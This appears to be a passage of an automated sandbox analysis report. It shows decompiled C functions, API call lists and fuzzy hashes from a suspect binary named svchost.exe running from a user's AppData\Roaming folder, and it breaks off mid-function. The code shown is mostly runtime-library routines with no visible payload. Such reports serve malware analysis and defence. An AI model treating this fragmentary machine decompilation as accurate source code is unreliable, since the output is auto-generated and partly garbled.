                            0x00bd452d

                            APIs
                            • GetLastError.KERNEL32(?,?,?,00BCC9D3,00BD0B62,?,00BD4453,00000001,00000364,?,00BCA8EB,?,?,00000000), ref: 00BD44AE
                            • _free.LIBCMT ref: 00BD44E3
                            • _free.LIBCMT ref: 00BD450A
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD4517
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD4520
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: 0eabfc46e855bd456d3729033598baf1feb483183bfce03e994d4dd3836a2aff
                            • Instruction ID: abd7f0533babff514ef02fd50e6ee6b96489c185b833d958c324f9be0b8c9d8c
                            • Opcode Fuzzy Hash: 0eabfc46e855bd456d3729033598baf1feb483183bfce03e994d4dd3836a2aff
                            • Instruction Fuzzy Hash: 6501D13625074167822276796CDAB2FA6EADFD1765B2001A7F50497393FF708E824621
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD7E7E, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BD7E7E(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xbec838; // 0xbec830
					if(_t23 != 0) {
						E00BD09EB(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xbec83c; // 0xbf6555
					if(_t24 != 0) {
						E00BD09EB(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xbec840; // 0xbf6555
					if(_t25 != 0) {
						E00BD09EB(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xbec868; // 0xbec834
					if(_t26 != 0) {
						E00BD09EB(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xbec86c; // 0xbf6558
					if(_t27 != 0) {
						return E00BD09EB(_t6);
					}
				}
				return _t6;
			}










                            0x00bd7e84
                            0x00bd7e89
                            0x00bd7e8d
                            0x00bd7e93
                            0x00bd7e96
                            0x00bd7e9b
                            0x00bd7e9f
                            0x00bd7ea5
                            0x00bd7ea8
                            0x00bd7ead
                            0x00bd7eb1
                            0x00bd7eb7
                            0x00bd7eba
                            0x00bd7ebf
                            0x00bd7ec3
                            0x00bd7ec9
                            0x00bd7ecc
                            0x00bd7ed1
                            0x00bd7ed2
                            0x00bd7ed5
                            0x00bd7edb
                            0x00000000
                            0x00bd7ee3
                            0x00bd7edb
                            0x00bd7ee6

                            APIs
                            • _free.LIBCMT ref: 00BD7E96
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BD7EA8
                            • _free.LIBCMT ref: 00BD7EBA
                            • _free.LIBCMT ref: 00BD7ECC
                            • _free.LIBCMT ref: 00BD7EDE
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: f13d000bd5ab036ac8e0363abe252b610c0f3433d13053b06ff328aa93cc9549
                            • Instruction ID: dad5c0b9786caa9effac79de62cd152654e23ae7823503d1215d703d1a74bfa1
                            • Opcode Fuzzy Hash: f13d000bd5ab036ac8e0363abe252b610c0f3433d13053b06ff328aa93cc9549
                            • Instruction Fuzzy Hash: 5DF0FF72559244AB9620FB5DE9C6D6BB7EDEA00B1076408C7F008DB711EF34FC818754
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD0833, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E00BD0833(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xbec828; // 0xe0b108
					if(_t7 != 0xbec608) {
						E00BD09EB(_t7);
						 *0xbec828 = 0xbec608;
					}
				}
				E00BD09EB( *0xbf630c);
				 *0xbf630c = 0;
				E00BD09EB( *0xbf6310);
				 *0xbf6310 = 0;
				E00BD09EB( *0xbf5e70);
				 *0xbf5e70 = 0;
				E00BD09EB( *0xbf5e74);
				 *0xbf5e74 = 0;
				return 1;
			}




                            0x00bd083c
                            0x00bd0840
                            0x00bd0842
                            0x00bd084e
                            0x00bd0851
                            0x00bd0857
                            0x00bd0857
                            0x00bd084e
                            0x00bd0863
                            0x00bd0870
                            0x00bd0876
                            0x00bd0881
                            0x00bd0887
                            0x00bd0892
                            0x00bd0898
                            0x00bd08a0
                            0x00bd08a9

                            APIs
                            • _free.LIBCMT ref: 00BD0851
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BD0863
                            • _free.LIBCMT ref: 00BD0876
                            • _free.LIBCMT ref: 00BD0887
                            • _free.LIBCMT ref: 00BD0898
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: d09fc63c03d92f2a2c7433c7407b79612350034b31572b457899c35db3980d10
                            • Instruction ID: 2e666e5acecce318e4dc4701717218af3c80753ed9e8e797773471abef97baf6
                            • Opcode Fuzzy Hash: d09fc63c03d92f2a2c7433c7407b79612350034b31572b457899c35db3980d10
                            • Instruction Fuzzy Hash: 0DF030B1C116509B9A217F2DBC5652A7FE4E718B207000687F82097372EF760E42DFC4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCF756, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E00BCF756(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0xbf5eb0, 0x104);
					_t48 =  *0xbf5e7c; // 0xe026c2
					 *0xbf5e80 = 0xbf5eb0;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0xbf5eb0;
					}
					_v8 = 0;
					_v16 = 0;
					E00BCF875(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E00BCF9FB(_v8, _v16, 2);
					if(_t61 != 0) {
						E00BCF875(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E00BD7493(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0xbf5e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0xbf5e74 = _t56;
									L16:
									E00BD09EB(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0xbf5e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0xbf5e74 = _t42;
						goto L10;
					} else {
						_t43 = E00BCC9CE();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E00BD09EB(_t61);
						return _t49;
					}
				} else {
					_t44 = E00BCC9CE();
					_t62 = 0x16;
					 *_t44 = _t62;
					E00BD1788();
					return _t62;
				}
			}

















                            0x00bcf763
                            0x00bcf791
                            0x00bcf797
                            0x00bcf79d
                            0x00bcf7a5
                            0x00bcf7ac
                            0x00bcf7ac
                            0x00bcf7b1
                            0x00bcf7b8
                            0x00bcf7bf
                            0x00bcf7d1
                            0x00bcf7d8
                            0x00bcf7f7
                            0x00bcf803
                            0x00bcf81e
                            0x00bcf821
                            0x00bcf828
                            0x00bcf82e
                            0x00bcf835
                            0x00bcf838
                            0x00bcf83a
                            0x00bcf83e
                            0x00bcf848
                            0x00bcf848
                            0x00bcf84a
                            0x00bcf850
                            0x00bcf853
                            0x00bcf855
                            0x00bcf85b
                            0x00bcf85c
                            0x00bcf862
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bcf840
                            0x00bcf840
                            0x00bcf840
                            0x00bcf843
                            0x00bcf844
                            0x00000000
                            0x00bcf840
                            0x00bcf830
                            0x00000000
                            0x00bcf830
                            0x00bcf809
                            0x00bcf80e
                            0x00bcf810
                            0x00bcf812
                            0x00000000
                            0x00bcf7da
                            0x00bcf7da
                            0x00bcf7df
                            0x00bcf7e1
                            0x00bcf7e2
                            0x00bcf817
                            0x00bcf817
                            0x00bcf865
                            0x00bcf866
                            0x00000000
                            0x00bcf86f
                            0x00bcf76b
                            0x00bcf76b
                            0x00bcf772
                            0x00bcf773
                            0x00bcf775
                            0x00000000
                            0x00bcf77a

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\svchost.exe,00000104), ref: 00BCF791
                            • _free.LIBCMT ref: 00BCF85C
                            • _free.LIBCMT ref: 00BCF866
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Users\user\AppData\Roaming\svchost.exe
                            • API String ID: 2506810119-3187766684
                            • Opcode ID: cc6f7b4f8625c8dfd1263c3824c3b98412006b1c56732b73d8484417d27d9953
                            • Instruction ID: 5b618a5cfd2edf668f4154b8c9eb57f4bdad610940a301cdf7983927895000a6
                            • Opcode Fuzzy Hash: cc6f7b4f8625c8dfd1263c3824c3b98412006b1c56732b73d8484417d27d9953
                            • Instruction Fuzzy Hash: 9A315E71A00619EFDB21DF99D885EAEBBFDEB85710B1040FBF90497251D6B08E41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCF193, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E00BCF193(void* __ecx, char* _a4, char** _a8) {
				char* _v8;
				intOrPtr _v12;
				signed short* _v36;
				void* _t14;
				void* _t15;
				char** _t16;
				char* _t20;
				void* _t27;
				signed int* _t28;
				signed int* _t32;
				void* _t39;
				void* _t52;
				signed int _t57;
				signed short* _t58;
				intOrPtr _t59;
				char* _t61;
				char* _t62;
				signed int _t64;
				signed int* _t66;
				char* _t68;
				signed short* _t70;

				_t39 = __ecx;
				_push(__ecx);
				_v8 = 0;
				_t14 = E00BD6CA2( &_v8, 0, L"TMP");
				if(_t14 == 0) {
					_t68 = _v8;
					_t61 = _t68;
					if(_t68 == 0) {
						goto L10;
					} else {
						_t20 = E00BD6D40(_t68, 0);
						if(_t20 != 0) {
							_push(_t61);
							L19();
							_t61 = _t20;
							if(_t61 == 0 || E00BD6D40(_t61, 0) != 0) {
								E00BD09EB(_t61);
								goto L10;
							} else {
								 *_a8 = _t61;
								E00BD09EB(0);
							}
						} else {
							_t68 = 0;
							 *_a8 = _t61;
						}
					}
					goto L17;
				} else {
					if(_t14 == 0x16) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00BD1798();
						asm("int3");
						_push(_t39);
						_push(0);
						_push(_t67);
						_t70 = _v36;
						_push(_t60);
						_t52 = 0;
						_t27 = 0;
						_t58 = _t70;
						_t64 =  *_t70 & 0x0000ffff;
						if(_t64 == 0) {
							L34:
							_t28 = 0;
						} else {
							_v12 = 0x22;
							do {
								if(_t64 == _v12) {
									_t52 = _t52 + 1;
								}
								_t58 =  &(_t58[1]);
								_t27 = _t27 + 1;
								_t64 =  *_t58 & 0x0000ffff;
							} while (_t64 != 0);
							if(_t52 == 0) {
								goto L34;
							} else {
								_t66 = E00BD0B10(_t52, _t27 - _t52 + 1, 2);
								if(_t66 != 0) {
									_t32 = _t66;
									if( *_t70 != 0) {
										_t59 = _v12;
										do {
											_t57 =  *_t70 & 0x0000ffff;
											if(_t57 != _t59) {
												 *_t32 = _t57;
												_t32 =  &(_t32[0]);
											}
											_t70 =  &(_t70[1]);
										} while ( *_t70 != 0);
									}
									 *_t32 = 0;
								} else {
									_t66 = 0;
								}
								E00BD09EB(0);
								_t28 = _t66;
							}
						}
						return _t28;
					} else {
						_t68 = 0;
						L10:
						_t62 = _a4;
						if(_t62 == 0 || E00BD6D40(_t62, 0) != 0) {
							_t62 = "\\";
							_t15 = E00BD6D40(_t62, 0);
							_t16 = _a8;
							if(_t15 == 0) {
								goto L13;
							} else {
								 *_t16 = ".";
							}
						} else {
							_t16 = _a8;
							L13:
							 *_t16 = _t62;
						}
						_t61 = 0;
						L17:
						E00BD09EB(_t68);
						return _t61;
					}
				}
			}
























                            0x00bcf193
                            0x00bcf198
                            0x00bcf1a8
                            0x00bcf1ab
                            0x00bcf1b5
                            0x00bcf1c4
                            0x00bcf1c7
                            0x00bcf1cb
                            0x00000000
                            0x00bcf1cd
                            0x00bcf1cf
                            0x00bcf1d8
                            0x00bcf1e3
                            0x00bcf1e4
                            0x00bcf1e9
                            0x00bcf1ee
                            0x00bcf20c
                            0x00000000
                            0x00bcf1fd
                            0x00bcf201
                            0x00bcf203
                            0x00bcf208
                            0x00bcf1da
                            0x00bcf1dd
                            0x00bcf1df
                            0x00bcf1df
                            0x00bcf1d8
                            0x00000000
                            0x00bcf1b7
                            0x00bcf1ba
                            0x00bcf25a
                            0x00bcf25b
                            0x00bcf25c
                            0x00bcf25d
                            0x00bcf25e
                            0x00bcf25f
                            0x00bcf264
                            0x00bcf26a
                            0x00bcf26b
                            0x00bcf26c
                            0x00bcf26d
                            0x00bcf272
                            0x00bcf273
                            0x00bcf275
                            0x00bcf277
                            0x00bcf279
                            0x00bcf27f
                            0x00bcf2e6
                            0x00bcf2e6
                            0x00bcf281
                            0x00bcf281
                            0x00bcf288
                            0x00bcf28c
                            0x00bcf28e
                            0x00bcf28e
                            0x00bcf28f
                            0x00bcf292
                            0x00bcf293
                            0x00bcf296
                            0x00bcf29d
                            0x00000000
                            0x00bcf29f
                            0x00bcf2aa
                            0x00bcf2b0
                            0x00bcf2b6
                            0x00bcf2bb
                            0x00bcf2bd
                            0x00bcf2c0
                            0x00bcf2c0
                            0x00bcf2c6
                            0x00bcf2c8
                            0x00bcf2cb
                            0x00bcf2cb
                            0x00bcf2ce
                            0x00bcf2d1
                            0x00bcf2c0
                            0x00bcf2d8
                            0x00bcf2b2
                            0x00bcf2b2
                            0x00bcf2b2
                            0x00bcf2dc
                            0x00bcf2e2
                            0x00bcf2e2
                            0x00bcf29d
                            0x00bcf2ee
                            0x00bcf1c0
                            0x00bcf1c0
                            0x00bcf212
                            0x00bcf212
                            0x00bcf217
                            0x00bcf22e
                            0x00bcf234
                            0x00bcf23c
                            0x00bcf240
                            0x00000000
                            0x00bcf242
                            0x00bcf242
                            0x00bcf242
                            0x00bcf226
                            0x00bcf226
                            0x00bcf229
                            0x00bcf229
                            0x00bcf229
                            0x00bcf248
                            0x00bcf24a
                            0x00bcf24b
                            0x00bcf259
                            0x00bcf259
                            0x00bcf1ba

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free
                            • String ID: TMP
                            • API String ID: 269201875-3125297090
                            • Opcode ID: 3eaaaec9277b387ebe40aeda2ff767709e8f88d4c820fd741a947e4a39d9e4f2
                            • Instruction ID: 60127fe0d9e579ea98d5b1c8da1d5b6378cd6e427d0f914e82c22c793b8385c0
                            • Opcode Fuzzy Hash: 3eaaaec9277b387ebe40aeda2ff767709e8f88d4c820fd741a947e4a39d9e4f2
                            • Instruction Fuzzy Hash: 2221F37B604507AF57256E5AA881F7FA3EEEA8577472500FEF804EF341EA30DC015260
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC27A0, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                            Download Yara Rule
                            C-Code - Quality: 40%
                            			E00BC27A0(void* __edx, signed int _a8192, char* _a8200) {
				short _v0;
				signed int _t9;
				long _t12;
				signed int _t14;
				void* _t26;
				char* _t28;
				signed int _t32;
				signed int _t33;

				_t26 = __edx;
				E00BC7880();
				_t9 =  *0xbec008; // 0xdc55bb75
				_a8192 = _t9 ^ _t32;
				_t28 = _a8200;
				_t12 = GetModuleFileNameW(0,  &_v0, 0x1000);
				_t39 = _t12;
				if(_t12 != 0) {
					_t14 = E00BC4C90(_t28,  &_v0, 0x1000);
					_t33 = _t32 + 0xc;
					__eflags = _t14;
					if(__eflags != 0) {
						__eflags = _a8192 ^ _t33;
						E00BC786A();
						return 1;
					} else {
						_push("Failed to convert executable path to UTF-8.");
						E00BC1910(__eflags);
						__eflags = _a8192 ^ _t33 + 0x00000004;
						E00BC786A();
						return 0;
					}
				} else {
					_push("Failed to get executable path.");
					_push("GetModuleFileNameW");
					E00BC1860(_t26, _t39);
					E00BC786A();
					return 0;
				}
			}











                            0x00bc27a0
                            0x00bc27a5
                            0x00bc27aa
                            0x00bc27b1
                            0x00bc27b9
                            0x00bc27cc
                            0x00bc27d2
                            0x00bc27d4
                            0x00bc280b
                            0x00bc2810
                            0x00bc2813
                            0x00bc2815
                            0x00bc2849
                            0x00bc284b
                            0x00bc2856
                            0x00bc2817
                            0x00bc2817
                            0x00bc281c
                            0x00bc282e
                            0x00bc2830
                            0x00bc283b
                            0x00bc283b
                            0x00bc27d6
                            0x00bc27d6
                            0x00bc27db
                            0x00bc27e0
                            0x00bc27f4
                            0x00bc27ff
                            0x00bc27ff

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00BC24BA,?,?), ref: 00BC27CC
                              • Part of subcall function 00BC1860: GetLastError.KERNEL32(?,?), ref: 00BC187D
                            Strings
                            • GetModuleFileNameW, xrefs: 00BC27DB
                            • Failed to convert executable path to UTF-8., xrefs: 00BC2817
                            • Failed to get executable path., xrefs: 00BC27D6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastModuleName
                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                            • API String ID: 2776309574-482168174
                            • Opcode ID: 64c71ba6037f09c1a550141163fac1c4efeba5a18d453994ca6984c925c467de
                            • Instruction ID: 582a38921a42148a775d8d27a2d6a69c6ef741ecdbd5427e0569ca26b0751884
                            • Opcode Fuzzy Hash: 64c71ba6037f09c1a550141163fac1c4efeba5a18d453994ca6984c925c467de
                            • Instruction Fuzzy Hash: E601D8716543405BF628F765AC8FFAB32D4EF94700F8008ADB609C6293FEB49944C697
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD4658, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E00BD4658(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00BCAFAE(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00BDF230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00BDF230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00BC8520(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00BDF230( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
